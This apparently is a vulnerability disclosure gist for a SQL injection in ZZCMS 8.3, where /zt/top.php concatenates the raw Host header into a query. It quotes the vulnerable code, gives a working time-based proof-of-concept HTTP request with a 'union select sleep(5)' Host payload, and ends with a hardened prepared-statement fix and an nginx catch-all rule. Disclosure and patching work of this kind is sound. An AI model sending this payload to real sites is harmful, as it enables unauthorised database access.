@Lz1y

Lz1y/zzcms_sqlinject.md

Last active Aug 9, 2018
ZZCMS SQL injection on an nginx server

PoC by Lz1y

ZZCMS latest version download page:

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

Vulnerable code:

In file "/zt/top.php", line 5:

```php
<?php
//echo $_SERVER['REQUEST_URI'];
$editor=isset($_REQUEST['editor'])?$_REQUEST['editor']:'';
$editor=substr($_SERVER['HTTP_HOST'],0,strpos($_SERVER['HTTP_HOST'],'.'));//get the username from the sub-domain
$rs=query("select * from zzcms_userdomain where domain='".$_SERVER['HTTP_HOST']."' and passed=1 and del=0");//get the username from the top-level domain
$row=num_rows($rs);
if (!$row){
	$row=fetch_array($rs);
	$editor=$row["username"];
}
$id=isset($_REQUEST['id'])?$_REQUEST['id']:0;
checkid($id,1);
...
```

In line 5 the code concatenates $_SERVER['HTTP_HOST'] directly into the SQL query. That variable is the raw Host request header, which an attacker controls when the site is served by nginx (nginx passes the header through to PHP unchanged, even when it contains quotes or spaces). So just find a page that includes /zt/top.php, like /zt/job.php:

```php
<?php
include("../inc/conn.php");
include("../inc/fy.php");
include("top.php");
include("bottom.php");
include("left.php");
...
```

POC:

```http
GET /zt/job.php?id=0&editor=aa HTTP/1.1
Host: xxxx.com' union select sleep(5),0,0,0,0-- '
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 
Connection: close
```

Debug info: screenshots (not reproduced here) showing the response delay with sleep(5) versus sleep(1), confirming the time-based injection.
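A hardened replacement for the lookup in /zt/top.php, added here as an example and not taken from ZZCMS: the Host value is validated as a hostname and then bound as a prepared-statement parameter instead of being concatenated into the query. It assumes an existing mysqli connection `$conn` rather than the CMS's own `query()` wrapper, and the function name `resolveDomainOwner` is hypothetical.

```php
<?php
// Added example (not ZZCMS code). Assumes $conn is an open mysqli connection.

function resolveDomainOwner(mysqli $conn, string $rawHost): ?string
{
    // Drop an optional ":port", lower-case, then accept only RFC 1123 hostname
    // characters: labels of letters, digits and hyphens, joined by dots.
    // Quotes, spaces and comment markers such as "-- " are rejected outright.
    $host = strtolower(explode(':', $rawHost, 2)[0]);
    $label = '(?!-)[a-z0-9-]{1,63}(?<!-)';
    if ($host === '' || strlen($host) > 253
        || !preg_match("/^{$label}(\\.{$label})*$/", $host)) {
        return null; // unknown tenant; nothing from the header reaches the SQL text
    }

    // Parameterised query: $host is sent as data, so even a value that passed
    // the filter above cannot change the structure of the statement.
    $stmt = $conn->prepare(
        'SELECT username FROM zzcms_userdomain WHERE domain = ? AND passed = 1 AND del = 0'
    );
    $stmt->bind_param('s', $host);
    $stmt->execute();
    $stmt->bind_result($username);
    $owner = $stmt->fetch() ? $username : null;
    $stmt->close();
    return $owner;
}

// Page usage: no owner means no editor, rather than an error or a raw-header fallback.
$editor = resolveDomainOwner($conn, $_SERVER['HTTP_HOST'] ?? '') ?? '';
```

At the web-server layer the same class of request can be stopped before it reaches PHP by giving nginx a catch-all `server` block (`server_name _; return 444;`) so that only registered Host values are routed to the application.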
